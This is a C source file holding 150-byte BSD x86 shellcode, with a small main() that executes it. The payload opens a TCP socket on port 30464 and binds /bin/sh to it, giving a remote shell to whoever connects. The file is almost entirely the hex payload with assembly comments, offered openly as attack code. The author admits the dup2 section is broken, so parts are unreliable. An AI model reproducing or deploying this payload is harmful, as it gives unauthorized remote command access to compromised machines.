150 byte BSD shellcode that binds /bin/sh to tcp port 30464.
46e90d484abaafeadeec0338ba23c502fab10692f9aa3c7a492fd88c113aa870
/*
BSD SHELLCODE
150 byte shellcode that binds /bin/sh on port 30464
By R00T-dude
note: this is a port of my linux shellcode, and is
pretty crappy, could be highly optimized + the
dup2() part of the shellcode needs to be fixed,
for this reason stderr isn't dup'ed.
*/
char shellcode[] =
/* fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP) */
"\x31\xc0" // xorl %eax,%eax
"\x31\xdb" // xorl %ebx,%ebx
"\x31\xc9" // xorl %ecx,%ecx
"\x31\xd2" // xorl %edx,%edx
"\xb0\x61" // movb $0x61,%al
"\x51" // pushl %ecx
"\xb1\x06" // movb $0x6,%cl
"\x51" // pushl %ecx
"\xb1\x01" // movb $0x1,%cl
"\x51" // pushl %ecx
"\xb1\x02" // movb $0x2,%cl
"\x51" // pushl %ecx
"\x8d\x0c\x24" // leal (%esp),%ecx
"\x51" // pushl %ecx
"\xcd\x80" // int $0x80
/* it binds on port 30464 */
/* bind(fd, (struct sockaddr*)&sin, sizeof(sin)) */
/*
turns out that the bsd struct sockaddr_in differs
from the linux one, arg !!!!!
*/
"\xb1\x02" // movb $0x2,%cl
"\x31\xc9" // xorl %ecx,%ecx
"\x51" // pushl %ecx
"\x51" // pushl %ecx
"\x51" // pushl %ecx
/* port = 0x77, change if needed */
"\x80\xc1\x77" // addb $0x77,%cl
"\x66\x51" // pushw %cx
"\xb5\x02" // movb $0x2,%ch
"\x66\x51" // pushw %cx
"\x8d\x0c\x24" // leal (%esp),%ecx
"\xb2\x10" // movb $0x10,%dl
"\x52" // pushl %edx
"\x51" // pushl %ecx
"\x50" // pushl %eax
"\x8d\x0c\x24" // leal (%esp),%ecx
"\x51" // pushl %ecx
"\x89\xc2" // movl %eax,%edx
"\x31\xc0" // xorl %eax,%eax
"\xb0\x68" // movb $0x68,%al
"\xcd\x80" // int $0x80
/* listen(fd, 1)*/
"\xb3\x01" // movb $0x1,%bl
"\x53" // pushl %ebx
"\x52" // pushl %edx
"\x8d\x0c\x24" // leal (%esp),%ecx
"\x51" // pushl %ecx
"\x31\xc0" // xorl %eax,%eax
"\xb0\x6a" // movb $0x6a,%al
"\xcd\x80" // int $0x80
/* cli = accept(fd, 0,0) */
"\x31\xc0" // xorl %eax,%eax
"\x50" // pushl %eax
"\x50" // pushl %eax
"\x52" // pushl %edx
"\x8d\x0c\x24" // leal (%esp),%ecx
"\x51" // pushl %ecx
"\x31\xc9" // xorl %ecx,%ecx
"\xb0\x1e" // movb $0x1e,%al
"\xcd\x80" // int $0x80
/* this dup2() code is screwed and needs to be fixed !!! */
/* dup2(cli, 0) <-- doesn't work !!! */
"\x89\xc3" // movl %eax,%ebx
"\x53" // pushl %ebx
"\x51" // pushl %ecx
"\x31\xc0" // xorl %eax,%eax
"\xb0\x5a" // movb $0x5a,%al
"\xcd\x80" // int $0x80
/* dup2(cli, 1) */
"\x41" // inc %ecx
"\x53" // pushl %ebx
"\x51" // pushl %ecx
"\x31\xc0" // xorl %eax,%eax
"\xb0\x5a" // movb $0x5a,%al
"\xcd\x80" // int $0x80
/* dup2(cli, 2) */
"\x41" // inc %ecx
"\x53" // pushl %ebx
"\x51" // pushl %ecx
"\x31\xc0" // xorl %eax,%eax
"\xb0\x5a" // movb $0x5a,%al
"\xcd\x80" // int $0x80
/* execve("//bin/sh", ["//bin/sh", NULL], NULL) */
/* this is eSDee's bsd /bin/sh code */
"\x31\xdb" // xorl %ebx,%ebx
"\x53" // pushl %ebx
"\x68\x6e\x2f\x73\x68" // pushl $0x68732f6e
"\x68\x2f\x2f\x62\x69" // pushl $0x69622f2f
"\x89\xe3" // movl %esp,%ebx
"\x31\xc0" // xorl %eax,%eax
"\x50" // pushl %eax
"\x54" // pushl %esp
"\x53" // pushl %ebx
"\x50" // pushl %eax
"\xb0\x3b" // mov $0x3b,%al
"\xcd\x80" // int $0x80
/* exit(stack_shit) */
"\x31\xc0" // xorl %eax,%eax
"\xb0\x01" // mobv $0x1,%al
"\xcd\x80"; // int $0x80
int main(void)
{
void (*funct)();
(long) funct = &shellcode;
funct();
}